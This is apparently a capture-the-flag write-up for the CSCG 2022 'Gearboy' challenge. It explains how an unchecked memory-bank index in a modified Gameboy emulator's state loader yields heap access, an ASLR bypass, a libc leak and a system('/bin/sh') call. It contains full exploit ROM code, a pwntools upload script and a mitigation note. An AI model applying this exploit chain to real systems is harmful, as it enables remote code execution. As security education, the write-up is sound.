cscg22-gearboy

CSCG 2022 Challenge 'Gearboy'
git clone https://git.sinitax.com/sinitax/cscg22-gearboy
Log | Files | Refs | sfeed.txt

document.md (6906B)


      1---
      2documentclass: extarticle
      3geometry: margin=2cm
      4title: Gearboy Writeup
      5author: sinitax
      6fontsize: 12pt
      7---
      8
      9## Exploit
     10
     11The task is to gain remote code execution (atleast to the point of
     12reading the contents of the flag file) by manipulating only a gameboy
     13rom and state file which will be run on the server using a modified,
     14headless version of [*Gearboy*](https://github.com/drhelius/Gearboy),
     15a gameboy emulator.
     16
     17My immediate suspicions were with missing checks for the state file and
     18not the ROM, because the state can be saved at any time and its
     19generally easier to forget checks before every use instead of once upon
     20loading the ROM.
     21
     22By inspecting the source code for `GearboyCore::LoadState` we find the
     23functionality for the emulator split into many different classes and
     24a LoadState for each, e.g. `Processor::LoadState` and `Memory::LoadState`.
     25
     26`Memory::LoadState` loads among other things various memory bank buffers
     27as well as values which control which of those banks are selected. Since
     28the address space of the gameboy is limited (16-bit address space), parts
     29of the memory must be swapped out to facilitate access to larger amounts.
     30Often times and index is used to indicate which memory bank is in use,
     31as is the case with `WRAM1`:
     32
     33```
     34u8* Memory::GetWRAM1()
     35{
     36    return m_bCGB ? m_pWRAMBanks + (0x1000 * m_iCurrentWRAMBank) : m_pMap + 0xD000;
     37}
     38```
     39
     40As long as `m_bCGB` (a flag enabling gameboy color mode) is set, the
     41backing buffer of `WRAM1` will be chosen from a bank in `m_pWRAMBanks`.
     42The value of `m_bCGB` is controlled by special purpose bytes in the
     43ROM which we can control.
     44
     45Since `m_iCurrentWRAMBank` is loaded as part of the state and its value
     46is not properly sanitized, modifying this value in the state file allows us to
     47essentially mmap an arbitrary piece of memory into the address space of our
     48emulated game. When the running ROM writes and reads to `0xD000-0xE000`,
     49it will instead access the address we control.
     50
     51But where to write when ASLR's enabled?
     52
     53To get around ASLR we need to find objects on the heap with consistent
     54offsets to the `WRAM` bank buffer `m_pWRAMBanks`. We can do this by
     55running `gdbserver` in the docker container and observing the surrounding
     56memory and pointers of objects allocated closely before or after. The
     57fact that each session is a freshly spawned docker container helps
     58with consistency.
     59
     60Doing this we find a heap configuration which is consistent on every first
     61run in the docker container: the address of the `Processor` object is
     62at an offset of `-0x126a0` from `m_pWRAMBanks` and the `Memory` object
     63is at an offset of `-0xd0` from the `Processor` object. By setting the
     64`m_iCurrentWRAMBank` value to `-0x13` in the state file we will be able
     65to access the `Processor` object at `0x13000-0x126a0+0xD000=0xD960`
     66and the `Memory` object at `0x13000-0x125d0+0xD000=0xD890`.
     67
     68For every instruction, the processor resolves the function for handling
     69an opcode by looking it up in a table using the opcode as an index. This
     70`opcodeTable` is a member of the `Processor` object and as such stored
     71on the heap. By reading one of these function pointers and subtracting
     72its offset in the binary we can recover the base address at which the
     73gearboy emulator is loaded.
     74
     75Now that we know the base address and as a result the address of the
     76GOT, regularly the next natural step is to leak libc by reading the got,
     77calculate the address of system and overwrite a function pointer
     78to call system. The only problem is, we are still just a ROM in
     79an emulator and only have access to the memory mapped into `0xD000-0xE000`.
     80
     81We need to look for another access primitive.
     82
     83This time, however, we are not limited to our state and rom file contents.
     84We can manipulate the `Memory` and `Processor` objects directly!
     85
     86Looking through the source code again we find a good candidate:
     87
     88```
     89u8* Memory::GetVRAM()
     90{
     91    if (m_bCGB)
     92        return (m_iCurrentLCDRAMBank == 1) ? m_pLCDRAMBank1 : m_pMap + 0x8000;
     93    else
     94        return m_pMap + 0x8000;
     95}
     96```
     97
     98We have already set `m_bCGB` and `m_iCurrentLCDRAMBank` is loaded from the
     99state file. As such, we can make access to `0x8000-0x9000` backed by the
    100`m_pLCDRAMBank1` buffer, whose pointer we control.
    101
    102We set `m_pLCDRAMBank1` in the `Memory` object to point to the target got
    103address of `free` which is calculated using the base address. We can then
    104read the `free` address from `0x8000`, leak the libc base and calculate
    105the `system` address.
    106
    107To finally call system, we overwrite a function pointer in
    108`Processor::opcodeTable` and call the corresponding opcode.
    109We ensure the first argument to `system` points to the string **/bin/sh**
    110by writing it to the address of the `Processor` object, as this is the address
    111in `rdi` when `system` is called. Since `opcodeTable` is the first
    112member in `Processor` we need to choose an opcode to call which does
    113not conflict with the space used for the string and also is not called
    114before the value can be fully written (as is the case with the load
    115instructions). The `stop` instruction (value `0x10`) is a good fit here.
    116
    117### Mitigation
    118
    119This attack can be mitigated by performing better input sanitization
    120when loading values from the state file. This would have prevented the
    121initial read / write out-of-bounds and as such the subsequent RCE.
    122This can be implemented for `m_iCurrentWRAMBank` as a simple range check.
    123
    124\newpage
    125
    126**ROM Code (compiled using GBDK):**\footnote{https://github.com/gbdk-2020/gbdk-2020/}
    127
    128```C
    129#include "stdint.h"
    130#include "string.h"
    131
    132void
    133main(void)
    134{
    135	volatile static uint8_t *processor_gb;
    136	volatile static uint8_t *memory_gb;
    137	volatile static uint8_t *free_got_gb;
    138	volatile static uint64_t op0x00;
    139	volatile static uint64_t base;
    140	volatile static uint64_t libc;
    141	volatile static uint64_t free_got;
    142	volatile static uint64_t target;
    143
    144	/* WRAM BANK = -0x13 */
    145	processor_gb = (void*) 0xD960;
    146	memory_gb = processor_gb - 0xd0;
    147
    148	/* get base from op0x00 */
    149	op0x00 = *(uint64_t*)processor_gb;
    150	base = op0x00 - 0x1d420;
    151	free_got = base + 0x4ad78;
    152
    153	/* change lcdrambank pointer to access got */
    154	*(uint64_t*)(memory_gb+0x90) = free_got;
    155	free_got_gb = (void*) 0x8000;
    156
    157	libc = (*(uint64_t*)free_got_gb) - 0x9a6d0;
    158
    159	target = libc + 0x52290;
    160	strcpy((char*)processor_gb, "/bin/sh");
    161	*(uint64_t*)(processor_gb+0x10*0x10) = target;
    162
    163	__asm \
    164		stop \
    165	__endasm;
    166
    167	while (1);
    168}
    169```
    170
    171\newpage
    172
    173**Upload and state modification script:**
    174
    175```python
    176from base64 import b64encode
    177from sys import argv,exit
    178from pwn import *
    179
    180rom = list(open("main.gb", "rb").read())
    181state = list(open("main.state", "rb").read())
    182
    183# set m_iCurrentWRAMBank
    184for i,v in enumerate(struct.pack("<i", -0x13)):
    185    state[0x10000+i] = v
    186
    187# set m_iCurrentLCDRAMBank
    188for i,v in enumerate(struct.pack("<i", 1)):
    189    state[0x10004+i] = v
    190
    191io = process(argv[1:])
    192
    193io.sendline(b64encode(bytes(rom)))
    194io.sendline(b64encode(bytes(state)))
    195
    196io.interactive()
    197```